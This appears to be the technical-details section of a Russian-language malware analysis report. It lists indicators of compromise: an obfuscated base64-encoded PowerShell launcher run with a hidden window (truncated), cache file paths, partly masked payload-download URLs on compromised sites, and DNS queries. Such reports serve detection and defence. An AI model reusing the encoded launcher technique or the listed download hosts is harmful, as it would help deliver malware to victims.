Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABTADIANgBfAGQANAA0AD0AKAAnAFcAJwArACgAJwBuACcAKwAnAF8AYgAnACkAKwAoACcAOAAnACsAJwA2AGEAJwApACkAOwAmACgAJwBuAGUAJwArACcAdwAtAGkAdABlAG0AJwApACAAJABlAE4AdgA6AFQAZQBNAFAAXAB3AE8AcgBEAFwAMgAwAD...
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
- http://go####tmoving.com/wp-content/3QC/
- http://bo#####.bluehost.com/suspended.page/disabled.cgi/www.charrmedia.com
- http://il####mercial.cl/wp-includes/P/
- http://ha#h.cz/blogs/XU/
- http://co###-shop.ru/wp-includes/nWJ/
- http://ca###s.com.br/wp-admin/8lArx/
- DNS ASK in####ricatoday.com
- DNS ASK go####tmoving.com
- DNS ASK bo#####.bluehost.com
- DNS ASK il####mercial.cl
- DNS ASK ha#h.cz
- DNS ASK my####llastuffs.xyz
- DNS ASK co###-shop.ru
- DNS ASK ca###s.com.br
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABTADIANgBfAGQANAA0AD0AKAAnAFcAJwArACgAJwBuACcAKwAnAF8AYgAnACkAKwAoACcAOAAnACsAJwA2AGEAJwApACkAOwAmACgAJwBuAGUAJwArACcAdwAtAGkAdABlAG0AJwApACAAJABlAE4AdgA6AFQAZQBNAFAAXAB3AE8AcgBEAFwAMgAwAD...' (со скрытым окном)